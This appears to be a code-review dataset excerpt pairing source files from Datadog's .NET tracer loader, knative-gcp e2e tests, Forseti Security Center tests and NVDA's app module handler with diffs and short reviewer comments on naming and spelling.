/// * As a precaution we support an _optional_ wait that use user can opt into by setting DD_INTERNAL_LOADER_DELAY_IIS_MILLISEC to /// a potitive number of milliseconds. (Since on IIS there is no exit condition to that delay, the option cannot be Boolean.) /// </remarks> private static void ExecuteDelayed(object assemblyLoaderObj) { try { AssemblyLoader assemblyLoader = (AssemblyLoader) assemblyLoaderObj; int startDelayMs = Environment.TickCount; if (IsAppHostedInIis()) { int sleepDurationMs = Math.Max(0, GetIisExecutionDelayMs()); Thread.Sleep(sleepDurationMs); } else { while (!IsAppDomainReadyForExecution()) { try { Thread.Sleep(ExecuteDelayedConstants.SleepDurationMs); } catch (Exception ex) { // Something unexpected and very bad happened, and we know that the logger in not yet initialized. // We must bail. LogToConsoleIfEnabled("Unexpected error while waiting for AppDomain to become ready for execution." + " Will not proceed loading assemblies to avoid unwanted side-effects.", ex); return; } } } int totalElapsedDelayMs = Environment.TickCount - startDelayMs; InitLogAndExecute(assemblyLoader, isDelayed: true, totalElapsedDelayMs); } catch { // Inside of 'InitLogAndExecute(..)' we do everything we can to prevent exceptions from escaping. // Our last choice is to let it escape and potentially crash the process or swallow it. We prefer the latter. } } private static bool IsExecutionDelayRequired() { // We delay IFF: return IsExecuteDelayedEnabled() // The user did NOT disable the delay feature; && AppDomain.CurrentDomain.IsDefaultAppDomain() // AND we are in the default AppDomain; && (!IsAppHostedInIis() || GetIisExecutionDelayMs() >= 1) // AND we are either NOT in IIS, OR we are in IIS and the user enabled IIS-delay; && !IsAppDomainReadyForExecution(); // AND the over-time-changing delay-stop contitions are not already met. } private static bool IsAppDomainReadyForExecution() { // If the entry assembly IS known, then we are ready. return (Assembly.GetEntryAssembly() != null); } private static void InitLogAndExecute(AssemblyLoader assemblyLoader, bool isDelayed, int waitForAppDomainReadinessElapsedMs) { try { LogConfigurator.SetupLogger(); } catch (Exception ex) { LogToConsoleIfEnabled("An error occurred while initializeing the logging subsystem. This is not an expected state." + " Will not proceed loading assemblies to avoid unwanted side-effects.", ex); return; } try { assemblyLoader.Execute(isDelayed, waitForAppDomainReadinessElapsedMs); } catch (Exception ex) { // An exception escaped from the loader. // We are about to return to the caller, which is either the IL-injected in the hook or the bottom of the delay-thread. // So all we can do is log the error and swallow it to avoid crashing things. Log.Error(LoggingComponentMoniker, ex); } } /// <summary> /// Loads the assemblies specified for this <c>AssemblyLoader</c> instance and executes their entry point. 
/// </summary> private void Execute(bool isDelayed, int waitForAppDomainReadinessElapsedMs) { #if DEBUG const string BuildConfiguration = "Debug"; #else const string BuildConfiguration = "Release"; #endif Log.Info(LoggingComponentMoniker, "Initializing...", "Managed Loader build configuration", BuildConfiguration, nameof(isDelayed), isDelayed, nameof(waitForAppDomainReadinessElapsedMs), waitForAppDomainReadinessElapsedMs, $"{nameof(IsExecuteDelayedEnabled)}()", IsExecuteDelayedEnabled(), $"{nameof(IsAppHostedInIis)}()", IsAppHostedInIis(), $"{nameof(GetIisExecutionDelayMs)}()", GetIisExecutionDelayMs()); AnalyzeAppDomain(); AssemblyResolveEventHandler assemblyResolveEventHandler = CreateAssemblyResolveEventHandler(); if (assemblyResolveEventHandler == null) { return; } Log.Info(LoggingComponentMoniker, "Registering AssemblyResolve handler"); try { AppDomain.CurrentDomain.AssemblyResolve += assemblyResolveEventHandler.OnAssemblyResolve; } catch (Exception ex) { Log.Error(LoggingComponentMoniker, "Error while registering an AssemblyResolve event handler", ex); } LogStartingToLoadAssembliesInfo(assemblyResolveEventHandler); for (int i = 0; i < assemblyResolveEventHandler.AssemblyNamesToLoad.Count; i++) { string assemblyName = assemblyResolveEventHandler.AssemblyNamesToLoad[i]; try { LoadAndStartAssembly(assemblyName); } catch (Exception ex) { Log.Error(LoggingComponentMoniker, "Error loading or starting a managed assembly", ex, "assemblyName", assemblyName); } } } private static void LogStartingToLoadAssembliesInfo(AssemblyResolveEventHandler assemblyResolveEventHandler) { var logEntryDetails = new List<object>(); logEntryDetails.Add("Number of assemblies"); logEntryDetails.Add(assemblyResolveEventHandler.AssemblyNamesToLoad.Count); logEntryDetails.Add("Number of product binaries directories"); logEntryDetails.Add(assemblyResolveEventHandler.ManagedProductBinariesDirectories.Count); for (int i = 0; i < assemblyResolveEventHandler.ManagedProductBinariesDirectories.Count; i++) { logEntryDetails.Add($"managedProductBinariesDirectories[{i}]"); logEntryDetails.Add(assemblyResolveEventHandler.ManagedProductBinariesDirectories[i]); } Log.Info(LoggingComponentMoniker, "Starting to load assemblies", logEntryDetails); } private static void LoadAndStartAssembly(string assemblyName) { // We have previously excluded assembly names that are null or white-space. assemblyName = assemblyName.Trim(); Log.Info(LoggingComponentMoniker, "Loading managed assembly", "assemblyName", assemblyName); Assembly assembly = Assembly.Load(assemblyName); if (assembly == null) { Log.Error(LoggingComponentMoniker, "Could not load managed assembly", "assemblyName", assemblyName); return; } Exception findEntryPointError = null; Type entryPointType = null; try { entryPointType = assembly.GetType(TargetLibraryEntrypointType, throwOnError: false); } catch (Exception ex) { findEntryPointError = ex; } if (entryPointType == null) { Log.Info( LoggingComponentMoniker, "Assembly was loaded, but entry point was not invoked, bacause it does not contain the entry point type", "assembly.FullName", assembly.FullName, "assembly.Location", assembly.Location, "assembly.CodeBase", assembly.CodeBase, "entryPointType", TargetLibraryEntrypointType, "findEntryPointError", (findEntryPointError == null) ? 
"None" : $"{findEntryPointError.GetType().Name}: {findEntryPointError.Message}"); return; } MethodInfo entryPointMethod = null; try { entryPointMethod = entryPointType.GetMethod(TargetLibraryEntrypointMethod, BindingFlags.Public | BindingFlags.Static, binder: null, types: new Type[0], modifiers: null); } catch (Exception ex) { findEntryPointError = ex; } if (entryPointMethod == null) { Log.Info( LoggingComponentMoniker, "Assembly was loaded, but entry point was not invoked: the entry point type was found, but it does not contain the entry point method (it must be public static)", "assembly.FullName", assembly.FullName, "assembly.Location", assembly.Location, "assembly.CodeBase", assembly.CodeBase, "entryPointType", entryPointType.FullName, "entryPointMethod", TargetLibraryEntrypointMethod, "findEntryPointError", (findEntryPointError == null) ? "None" : $"{findEntryPointError.GetType().Name}: {findEntryPointError.Message}"); return; } try { entryPointMethod.Invoke(obj: null, parameters: null); } catch (Exception ex) { Log.Error( LoggingComponentMoniker, "Assembly was loaded and the entry point was invoked; an exception was thrown from the entry point", ex, "assembly.FullName", assembly.FullName, "assembly.Location", assembly.Location, "assembly.CodeBase", assembly.CodeBase, "entryPointType", entryPointType.FullName, "entryPointMethod", entryPointMethod.Name); return; } Log.Info( LoggingComponentMoniker, "Assembly was loaded and the entry point was invoked", "assembly.FullName", assembly.FullName, "assembly.Location", assembly.Location, "assembly.CodeBase", assembly.CodeBase, "entryPointType", entryPointType.FullName, "entryPointMethod", entryPointMethod.Name); return; } private static IReadOnlyList<string> CleanAssemblyNamesToLoad(string[] assemblyNamesToLoad) { if (assemblyNamesToLoad == null) { Log.Info(LoggingComponentMoniker, $"Not loading any assemblies ({nameof(assemblyNamesToLoad)} is null). "); return null; } if (assemblyNamesToLoad.Length == 0) { Log.Info(LoggingComponentMoniker, $"Not loading any assemblies ({nameof(assemblyNamesToLoad)}.{nameof(assemblyNamesToLoad.Length)} is 0). "); return null; } // Check for bad assemblyNamesToLoad entries. We expect the array to be small and entries to be OK. // So scrolling multiple times is better then allocating a temp buffer. bool someAssemblyNameNeedsCleaning = false; int validAssemblyNamesCount = 0; for (int pAsmNames = 0; pAsmNames < assemblyNamesToLoad.Length; pAsmNames++) { if (CleanAssemblyNameToLoad(assemblyNamesToLoad[pAsmNames], out _, out bool asmNameNeedsCleaning)) { validAssemblyNamesCount++; someAssemblyNameNeedsCleaning = someAssemblyNameNeedsCleaning || asmNameNeedsCleaning; } } if (validAssemblyNamesCount == 0) { Log.Info(LoggingComponentMoniker, $"Not loading any assemblies. 
Some assembly names were specified, but they are all null or white-space."); return null; } if (assemblyNamesToLoad.Length == validAssemblyNamesCount && !someAssemblyNameNeedsCleaning) { return assemblyNamesToLoad; } string[] validAssemblyNamesToLoad = new string[validAssemblyNamesCount]; for (int pAsmNames = 0, pValidAsmNames = 0; pAsmNames < assemblyNamesToLoad.Length; pAsmNames++) { if (CleanAssemblyNameToLoad(assemblyNamesToLoad[pAsmNames], out string cleanAssemblyNameToLoad, out _)) { validAssemblyNamesToLoad[pValidAsmNames++] = cleanAssemblyNameToLoad; } } return validAssemblyNamesToLoad; } private static bool CleanAssemblyNameToLoad(string rawAssemblyName, out string cleanAssemblyName, out bool asmNameNeedsCleaning) { if (String.IsNullOrWhiteSpace(rawAssemblyName)) { cleanAssemblyName = null; asmNameNeedsCleaning = true; return false; } const string DllExtension = ".dll"; cleanAssemblyName = rawAssemblyName.Trim(); if (cleanAssemblyName.EndsWith(DllExtension, StringComparison.OrdinalIgnoreCase)) { cleanAssemblyName = cleanAssemblyName.Substring(0, cleanAssemblyName.Length - DllExtension.Length); } else { if (cleanAssemblyName.Equals(rawAssemblyName, StringComparison.Ordinal)) { asmNameNeedsCleaning = false; return true; } } if (String.IsNullOrWhiteSpace(cleanAssemblyName)) { cleanAssemblyName = null; asmNameNeedsCleaning = true; return false; } asmNameNeedsCleaning = true; return true; } private static IReadOnlyList<string> ResolveManagedProductBinariesDirectories() { var binaryDirs = new List<string>(capacity: 5); GetTracerManagedBinariesDirectories(binaryDirs); GetProfilerManagedBinariesDirectories(binaryDirs); return binaryDirs; } private static void GetTracerManagedBinariesDirectories(List<string> binaryDirs) { // E.g.: // - c:\Program Files\Datadog\.NET Tracer\tracer\net45\ // - c:\Program Files\Datadog\.NET Tracer\tracer\netcoreapp3.1\ // - ... string tracerHomeDirectory = ReadEnvironmentVariable("DD_DOTNET_TRACER_HOME"); if (String.IsNullOrWhiteSpace(tracerHomeDirectory)) { return; } string managedBinariesSubdir = GetRuntimeBasedProductBinariesSubdir(); string managedBinariesDirectory = Path.Combine(tracerHomeDirectory, managedBinariesSubdir); if (binaryDirs != null && !String.IsNullOrWhiteSpace(managedBinariesDirectory)) { binaryDirs.Add(managedBinariesDirectory); } } private static void GetProfilerManagedBinariesDirectories(List<string> binaryDirs) { // E.g.: // - c:\Program Files\Datadog\.NET Tracer\ContinuousProfiler\net45\ // - c:\Program Files\Datadog\.NET Tracer\ContinuousProfiler\netcoreapp3.1\ // - ... string profilerHomeDirectory = ReadEnvironmentVariable("DD_DOTNET_PROFILER_HOME"); // Be defensive against env var not being set. if (String.IsNullOrWhiteSpace(profilerHomeDirectory)) { return; } string managedBinariesSubdir = GetRuntimeBasedProductBinariesSubdir(); string managedBinariesDirectory = Path.Combine(profilerHomeDirectory, managedBinariesSubdir); if (binaryDirs != null && !String.IsNullOrWhiteSpace(managedBinariesDirectory)) { binaryDirs.Add(managedBinariesDirectory); } } private static string GetRuntimeBasedProductBinariesSubdir() { return GetRuntimeBasedProductBinariesSubdir(out bool _); } private static string GetRuntimeBasedProductBinariesSubdir(out bool isCoreFx) { Assembly objectAssembly = typeof(object).Assembly; isCoreFx = (objectAssembly?.FullName?.StartsWith("System.Private.CoreLib") == true); string productBinariesSubdir; if (isCoreFx) { // We are running under .NET Core (or .NET 5+). // Old versions of .NET core report a major version of 4. 
// The respective binaries are in <HOME>/netstandard2.0/... // Newer binaries are in <HOME>/netcoreapp3.1/... // This needs to be extended if and when we ship a specific distro for newer .NET versions! Version clrVersion = Environment.Version; if ((clrVersion.Major == 3 && clrVersion.Minor >= 1) || clrVersion.Major >= 5) { productBinariesSubdir = "netcoreapp3.1"; } else { productBinariesSubdir = "netstandard2.0"; } } else { // We are running under the (classic) .NET Framework. // We currently ship two distributions targeting .NET Framework. // We want to use the highest-possible compatible assembly version number. // We will try getting the version of mscorlib used. // If that version is >= 4.61 then we use the respective distro. Otherwise we use the Net F 4.5 distro. try { string objectAssemblyFileVersionString = ((AssemblyFileVersionAttribute) objectAssembly.GetCustomAttribute(typeof(AssemblyFileVersionAttribute))).Version; var objectAssemblyVersion = new Version(objectAssemblyFileVersionString); var mscorlib461Version = new Version("4.6.1055.0"); productBinariesSubdir = (objectAssemblyVersion < mscorlib461Version) ? "net45" : "net461"; } catch { productBinariesSubdir = "net45"; } } return productBinariesSubdir; } private static string ReadEnvironmentVariable(string envVarName) { try { return Environment.GetEnvironmentVariable(envVarName); } catch (Exception ex) { Log.Error(LoggingComponentMoniker, "Error while reading environment variable", ex, "envVarName", envVarName); return null; } } private static void LogToConsoleIfEnabled(string message, Exception ex = null) { if (UseConsoleLoggingIfFileLoggingFails) { #pragma warning disable IDE0079 // Remove unnecessary suppression: Supresion is necessary for some, but not all compile time settings #pragma warning disable CS0162 // Unreachable code detected (deliberately using const bool for compile settings) Console.WriteLine($"{Environment.NewLine}{LoggingComponentMoniker}: {message}" + (ex == null ? String.Empty : $"{Environment.NewLine}{ex}")); #pragma warning restore CS0162 // Unreachable code detected #pragma warning restore IDE0079 // Remove unnecessary suppression } } private void AnalyzeAppDomain() { AppDomain currAD = AppDomain.CurrentDomain; _isDefaultAppDomain = currAD.IsDefaultAppDomain(); Log.Info(LoggingComponentMoniker, "Will load and start assemblies listed for " + (_isDefaultAppDomain ? 
"the Default AppDomain" : "Non-default AppDomains") + "."); Log.Info(LoggingComponentMoniker, "Listing current AppDomain info", "IsDefaultAppDomain", _isDefaultAppDomain, "Id", currAD.Id, "FriendlyName", currAD.FriendlyName, #if NETFRAMEWORK "SetupInformation.TargetFrameworkName", currAD.SetupInformation.TargetFrameworkName, #else "SetupInformation.TargetFrameworkName", "Not available on this .NET version", #endif "IsFullyTrusted", currAD.IsFullyTrusted, "IsHomogenous", currAD.IsHomogenous, "BaseDirectory", currAD.BaseDirectory, "DynamicDirectory", currAD.DynamicDirectory, "RelativeSearchPath", currAD.RelativeSearchPath, "ShadowCopyFiles", currAD.ShadowCopyFiles); Assembly entryAssembly = Assembly.GetEntryAssembly(); Log.Info(LoggingComponentMoniker, "Listing Entry Assembly info", "FullName", entryAssembly?.FullName, "Location", entryAssembly?.Location); TryGetCurrentThread(out int osThreadId, out Thread currentThread); Log.Info(LoggingComponentMoniker, "Listing current Thread info", nameof(osThreadId), osThreadId, "IsBackground", currentThread?.IsBackground, "IsThreadPoolThread", currentThread?.IsThreadPoolThread, "ManagedThreadId", currentThread?.ManagedThreadId, "Name", currentThread?.Name); if (Log.IsDebugLoggingEnabled) { string stackTrace = Environment.StackTrace; Log.Debug(LoggingComponentMoniker, "Listing invocation Stack Trace", nameof(stackTrace), stackTrace); } } private static bool IsExecuteDelayedEnabled() { string isDelayEnabledEnvVarString = GetEnvironmentVariable(ExecuteDelayedConstants.IsEnabled_EnvVarName); Parse.TryBoolean(isDelayEnabledEnvVarString, ExecuteDelayedConstants.IsEnabled_DefaultVal, out bool isDelayEnabledValue); return isDelayEnabledValue; } private static int GetIisExecutionDelayMs() { string iisDelayMsEnvVarString = GetEnvironmentVariable(ExecuteDelayedConstants.IisDelayMs_EnvVarName); Parse.TryInt32(iisDelayMsEnvVarString, ExecuteDelayedConstants.IisDelayMs_DefaultVal, out int iisExecutionDelayMs); return iisExecutionDelayMs; } private static bool IsAppHostedInIis() { // Corresponds to the equivalent check in native: // https://github.com/DataDog/dd-trace-dotnet/blob/master/tracer/src/Datadog.Trace.ClrProfiler.Native/cor_profiler.cpp#L286-L289 string processFileName = CurrentProcess.GetMainFileName(); bool isAppHostedInIis = processFileName.Equals("w3wp.exe", StringComparison.OrdinalIgnoreCase) || processFileName.Equals("iisexpress.exe", StringComparison.OrdinalIgnoreCase); return isAppHostedInIis; } private static string GetEnvironmentVariable(string endVarName) { try { return Environment.GetEnvironmentVariable(endVarName); } catch { return null; } } private static bool TryGetCurrentThread(out int osThreadId, out Thread currentThread) { try { #pragma warning disable CS0618 // GetCurrentThreadId is obsolete but we can still use it for logging purposes (see respective docs) osThreadId = AppDomain.GetCurrentThreadId(); #pragma warning restore CS0618 // Type or member is obsolete currentThread = Thread.CurrentThread; return true; } catch { osThreadId = 0; currentThread = null; return false; } } private AssemblyResolveEventHandler CreateAssemblyResolveEventHandler() { // Pick the list that we want to load: string[] assemblyListToUse = _isDefaultAppDomain ? _assemblyNamesToLoadIntoDefaultAppDomain : _assemblyNamesToLoadIntoNonDefaultAppDomains; // Set class fields to null so that the arrays can be collected. The "assemblyResolveEventHandler" will encpsulate the data needed. 
_assemblyNamesToLoadIntoDefaultAppDomain = _assemblyNamesToLoadIntoNonDefaultAppDomains = null; IReadOnlyList<string> assemblyNamesToLoad = CleanAssemblyNamesToLoad(assemblyListToUse); if (assemblyNamesToLoad == null) { return null; } IReadOnlyList<string> managedProductBinariesDirectories = ResolveManagedProductBinariesDirectories(); var assemblyResolveEventHandler = new AssemblyResolveEventHandler(assemblyNamesToLoad, managedProductBinariesDirectories); return assemblyResolveEventHandler; } } }
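The delayed-execution approach described in the `ExecuteDelayed` remarks above (hand the work to a background thread, poll a cheap readiness condition, then run) is not specific to .NET. As a purely illustrative sketch, the same pattern in Python might look like the following; all names here are invented and none of this is part of the projects quoted in this dataset.

# Illustrative sketch of the "delay until the host is ready" pattern (not project code).
import threading
import time

def run_when_ready(is_ready, work, poll_interval_s=0.1):
    """Run work() now if is_ready() is already true; otherwise poll on a daemon thread."""
    if is_ready():
        work()
        return None

    def _wait_then_run():
        while not is_ready():
            time.sleep(poll_interval_s)
        work()

    thread = threading.Thread(target=_wait_then_run, name="delayed-init", daemon=True)
    thread.start()
    return thread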
1
23,156
> specialised

This isn't a typo in my neck of the woods
DataDog-dd-trace-dotnet
.cs
@@ -29,6 +29,7 @@ import ( var packages = []string{ "github.com/google/knative-gcp/test/cmd/target", + "github.com/google/knative-gcp/test/cmd/storageTarget", } var packageToImageConfig = map[string]string{}
1
// +build e2e /* Copyright 2019 Google LLC Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package e2e import ( "fmt" "os" "strings" "testing" "knative.dev/pkg/test/logstream" ) var packages = []string{ "github.com/google/knative-gcp/test/cmd/target", } var packageToImageConfig = map[string]string{} var packageToImageConfigDone bool func TestMain(m *testing.M) { for _, pack := range packages { image, err := KoPublish(pack) if err != nil { fmt.Printf("error attempting to ko publish: %s\n", err) panic(err) } i := strings.Split(pack, "/") packageToImageConfig[i[len(i)-1]+"Image"] = image } packageToImageConfigDone = true os.Exit(m.Run()) } // This test is more for debugging the ko publish process. func TestKoPublish(t *testing.T) { for k, v := range packageToImageConfig { t.Log(k, "-->", v) } } // Rest of e2e tests go below: // TestSmoke makes sure we can run tests. func TestSmokeChannel(t *testing.T) { cancel := logstream.Start(t) defer cancel() SmokeTestChannelImpl(t) } // TestSmokePullSubscription makes sure we can run tests on PullSubscriptions. func TestSmokePullSubscription(t *testing.T) { cancel := logstream.Start(t) defer cancel() SmokePullSubscriptionTestImpl(t) } // TestPullSubscriptionWithTarget tests we can knock down a target. func TestPullSubscriptionWithTarget(t *testing.T) { cancel := logstream.Start(t) defer cancel() PullSubscriptionWithTargetTestImpl(t, packageToImageConfig) }
1
9,354
will change to `storage_target`
google-knative-gcp
go
@@ -38,7 +38,7 @@ class SecurityCenterTest(unittest_utils.ForsetiTestCase): """Set up.""" fake_global_configs = { 'securitycenter': {'max_calls': 1, 'period': 1.1}} - cls.securitycenter_beta_api_client = securitycenter.SecurityCenterClient(version='v1beta1') + cls.securitycenter = securitycenter.SecurityCenterClient(version='v1') cls.project_id = 111111 cls.source_id = 'organizations/111/sources/222'
1
# Copyright 2017 The Forseti Security Authors. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests the Security Center API client.""" import json import unittest import mock import google.auth from google.oauth2 import credentials from google.cloud.forseti.common.gcp_api import securitycenter from google.cloud.forseti.common.gcp_api import errors as api_errors from tests import unittest_utils from tests.common.gcp_api.test_data import fake_securitycenter_responses as fake_cscc from tests.common.gcp_api.test_data import http_mocks class SecurityCenterTest(unittest_utils.ForsetiTestCase): """Test the Security Center Client.""" @classmethod @mock.patch.object( google.auth, 'default', return_value=(mock.Mock(spec_set=credentials.Credentials), 'test-project')) def setUpClass(cls, mock_google_credential): """Set up.""" fake_global_configs = { 'securitycenter': {'max_calls': 1, 'period': 1.1}} cls.securitycenter_beta_api_client = securitycenter.SecurityCenterClient(version='v1beta1') cls.project_id = 111111 cls.source_id = 'organizations/111/sources/222' def test_create_findings(self): """Test create cscc findings.""" http_mocks.mock_http_response( json.dumps(fake_cscc.EXPECTED_CREATE_FINDING_RESULT)) result = self.securitycenter_beta_api_client.create_finding( 'fake finding', source_id=self.source_id ) self.assertEquals(fake_cscc.EXPECTED_CREATE_FINDING_RESULT, result) def test_create_findings_raises(self): """Test create cscc finding raises exception.""" http_mocks.mock_http_response(fake_cscc.PERMISSION_DENIED, '403') # beta api fake_beta_finding = {'source_properties': {'violation_data': 'foo'}} with self.assertRaises(api_errors.ApiExecutionError): self.securitycenter_beta_api_client.create_finding( fake_beta_finding, source_id=self.source_id) if __name__ == '__main__': unittest.main()
1
33,884
This would be better as `cls.securitycenter_client`, to match what is being instantiated.
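If the reviewer's suggestion were folded into the patch above, the hunk might look roughly like this. The attribute name `securitycenter_client` is the reviewer's proposal, and existing call sites such as `self.securitycenter_beta_api_client.create_finding(...)` would be renamed to match; this is an illustrative sketch, not the actual follow-up commit.

@@ -38,7 +38,7 @@ class SecurityCenterTest(unittest_utils.ForsetiTestCase):
         """Set up."""
         fake_global_configs = {
             'securitycenter': {'max_calls': 1, 'period': 1.1}}
-        cls.securitycenter_beta_api_client = securitycenter.SecurityCenterClient(version='v1beta1')
+        cls.securitycenter_client = securitycenter.SecurityCenterClient(version='v1')
         cls.project_id = 111111
         cls.source_id = 'organizations/111/sources/222'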
forseti-security-forseti-security
py
@@ -34,6 +34,15 @@ import appModules import watchdog import extensionPoints from fileUtils import getFileVersionInfo +import shlobj +from functools import wraps + +# Path to the native system32 directory. +nativeSys32: str = shlobj.SHGetFolderPath(None, shlobj.CSIDL.SYSTEM) +# Path to the syswow64 directory if it exists on the current system. +Syswow64Sys32: str = shlobj.SHGetFolderPath(None, shlobj.CSIDL.SYSTEMX86) +# Do we have separate system32 directories for 32 and 64-bit processes? +hasSeparateSyswow64: bool = nativeSys32 != Syswow64Sys32 #Dictionary of processID:appModule paires used to hold the currently running modules runningTable={}
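For readers outside the NVDA code base: `shlobj` in the patch above is NVDA's own wrapper around the Windows shell API, so the same check can be approximated with plain `ctypes`. A rough, Windows-only sketch follows; the variable names mirror the patch, but this is not NVDA code.

# Stand-alone approximation of the check added by the patch above (Windows-only sketch).
import ctypes
import ctypes.wintypes

CSIDL_SYSTEM = 0x25      # native system32 directory for the current process
CSIDL_SYSTEMX86 = 0x29   # 32-bit system directory (SysWOW64 on 64-bit Windows)

def _known_folder(csidl):
    buf = ctypes.create_unicode_buffer(ctypes.wintypes.MAX_PATH)
    ctypes.windll.shell32.SHGetFolderPathW(None, csidl, None, 0, buf)
    return buf.value

nativeSys32 = _known_folder(CSIDL_SYSTEM)
syswow64Sys32 = _known_folder(CSIDL_SYSTEMX86)
hasSeparateSyswow64 = nativeSys32 != syswow64Sys32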
1
# -*- coding: UTF-8 -*- # A part of NonVisual Desktop Access (NVDA) # Copyright (C) 2006-2019 NV Access Limited, Peter Vágner, Aleksey Sadovoy, Patrick Zajda, Joseph Lee, # Babbage B.V., Mozilla Corporation # This file is covered by the GNU General Public License. # See the file COPYING for more details. """Manages appModules. @var runningTable: a dictionary of the currently running appModules, using their application's main window handle as a key. @type runningTable: dict """ import itertools import ctypes import ctypes.wintypes import os import sys import winVersion import pkgutil import importlib import threading import tempfile import comtypes.client import baseObject import globalVars from logHandler import log import NVDAHelper import winUser import winKernel import config import NVDAObjects #Catches errors before loading default appModule import api import appModules import watchdog import extensionPoints from fileUtils import getFileVersionInfo #Dictionary of processID:appModule paires used to hold the currently running modules runningTable={} #: The process ID of NVDA itself. NVDAProcessID=None _importers=None _getAppModuleLock=threading.RLock() #: Notifies when another application is taking foreground. #: This allows components to react upon application switches. #: For example, braille triggers bluetooth polling for braille displaysf necessary. #: Handlers are called with no arguments. post_appSwitch = extensionPoints.Action() class processEntry32W(ctypes.Structure): _fields_ = [ ("dwSize",ctypes.wintypes.DWORD), ("cntUsage", ctypes.wintypes.DWORD), ("th32ProcessID", ctypes.wintypes.DWORD), ("th32DefaultHeapID", ctypes.wintypes.DWORD), ("th32ModuleID",ctypes.wintypes.DWORD), ("cntThreads",ctypes.wintypes.DWORD), ("th32ParentProcessID",ctypes.wintypes.DWORD), ("pcPriClassBase",ctypes.c_long), ("dwFlags",ctypes.wintypes.DWORD), ("szExeFile", ctypes.c_wchar * 260) ] def getAppNameFromProcessID(processID,includeExt=False): """Finds out the application name of the given process. @param processID: the ID of the process handle of the application you wish to get the name of. @type processID: int @param includeExt: C{True} to include the extension of the application's executable filename, C{False} to exclude it. @type window: bool @returns: application name @rtype: str """ if processID==NVDAProcessID: return "nvda.exe" if includeExt else "nvda" FSnapshotHandle = winKernel.kernel32.CreateToolhelp32Snapshot (2,0) FProcessEntry32 = processEntry32W() FProcessEntry32.dwSize = ctypes.sizeof(processEntry32W) ContinueLoop = winKernel.kernel32.Process32FirstW(FSnapshotHandle, ctypes.byref(FProcessEntry32)) appName = str() while ContinueLoop: if FProcessEntry32.th32ProcessID == processID: appName = FProcessEntry32.szExeFile break ContinueLoop = winKernel.kernel32.Process32NextW(FSnapshotHandle, ctypes.byref(FProcessEntry32)) winKernel.kernel32.CloseHandle(FSnapshotHandle) if not includeExt: appName=os.path.splitext(appName)[0].lower() if not appName: return appName # This might be an executable which hosts multiple apps. # Try querying the app module for the name of the app being hosted. 
try: mod = importlib.import_module("appModules.%s" % appName, package="appModules") return mod.getAppNameFromHost(processID) except (ImportError, AttributeError, LookupError): pass return appName def getAppModuleForNVDAObject(obj): if not isinstance(obj,NVDAObjects.NVDAObject): return return getAppModuleFromProcessID(obj.processID) def getAppModuleFromProcessID(processID): """Finds the appModule that is for the given process ID. The module is also cached for later retreavals. @param processID: The ID of the process for which you wish to find the appModule. @type processID: int @returns: the appModule, or None if there isn't one @rtype: appModule """ with _getAppModuleLock: mod=runningTable.get(processID) if not mod: # #5323: Certain executables contain dots as part of their file names. appName=getAppNameFromProcessID(processID).replace(".","_") mod=fetchAppModule(processID,appName) if not mod: raise RuntimeError("error fetching default appModule") runningTable[processID]=mod return mod def update(processID,helperLocalBindingHandle=None,inprocRegistrationHandle=None): """Tries to load a new appModule for the given process ID if need be. @param processID: the ID of the process. @type processID: int @param helperLocalBindingHandle: an optional RPC binding handle pointing to the RPC server for this process @param inprocRegistrationHandle: an optional rpc context handle representing successful registration with the rpc server for this process """ # This creates a new app module if necessary. mod=getAppModuleFromProcessID(processID) if helperLocalBindingHandle: mod.helperLocalBindingHandle=helperLocalBindingHandle if inprocRegistrationHandle: mod._inprocRegistrationHandle=inprocRegistrationHandle def cleanup(): """Removes any appModules from the cache whose process has died. """ for deadMod in [mod for mod in runningTable.values() if not mod.isAlive]: log.debug("application %s closed"%deadMod.appName) del runningTable[deadMod.processID] if deadMod in set(o.appModule for o in api.getFocusAncestors()+[api.getFocusObject()] if o and o.appModule): if hasattr(deadMod,'event_appLoseFocus'): deadMod.event_appLoseFocus() import eventHandler eventHandler.handleAppTerminate(deadMod) try: deadMod.terminate() except: log.exception("Error terminating app module %r" % deadMod) def doesAppModuleExist(name): return any(importer.find_module("appModules.%s" % name) for importer in _importers) def fetchAppModule(processID,appName): """Returns an appModule found in the appModules directory, for the given application name. @param processID: process ID for it to be associated with @type processID: integer @param appName: the application name for which an appModule should be found. @type appName: str @returns: the appModule, or None if not found @rtype: AppModule """ # First, check whether the module exists. # We need to do this separately because even though an ImportError is raised when a module can't be found, it might also be raised for other reasons. modName = appName if doesAppModuleExist(modName): try: return importlib.import_module("appModules.%s" % modName, package="appModules").AppModule(processID, appName) except: log.exception(f"error in appModule {modName!r}") import ui import speech.priorities ui.message( # Translators: This is presented when errors are found in an appModule # (example output: error in appModule explorer). _("Error in appModule %s") % modName, speechPriority=speech.priorities.Spri.NOW ) # Use the base AppModule. 
return AppModule(processID, appName) def reloadAppModules(): """Reloads running appModules. especially, it clears the cache of running appModules and deletes them from sys.modules. Each appModule will then be reloaded immediately. """ global appModules state = [] for mod in runningTable.values(): state.append({key: getattr(mod, key) for key in ("processID", # #2892: We must save nvdaHelperRemote handles, as we can't reinitialize without a foreground/focus event. # Also, if there is an active context handle such as a loaded buffer, # nvdaHelperRemote can't reinit until that handle dies. "helperLocalBindingHandle", "_inprocRegistrationHandle", # #5380: We must save config profile triggers so they can be cleaned up correctly. # Otherwise, they'll remain active forever. "_configProfileTrigger", ) if hasattr(mod, key)}) # #2892: Don't disconnect from nvdaHelperRemote during termination. mod._helperPreventDisconnect = True terminate() del appModules mods=[k for k,v in sys.modules.items() if k.startswith("appModules") and v is not None] for mod in mods: del sys.modules[mod] import appModules initialize() for entry in state: pid = entry.pop("processID") mod = getAppModuleFromProcessID(pid) mod.__dict__.update(entry) # The appModule property for existing NVDAObjects will now be None, since their AppModule died. # Force focus, navigator, etc. objects to re-fetch, # since NVDA depends on the appModule property for these. for obj in itertools.chain((api.getFocusObject(), api.getNavigatorObject()), api.getFocusAncestors()): try: del obj._appModuleRef except AttributeError: continue # Fetch and cache 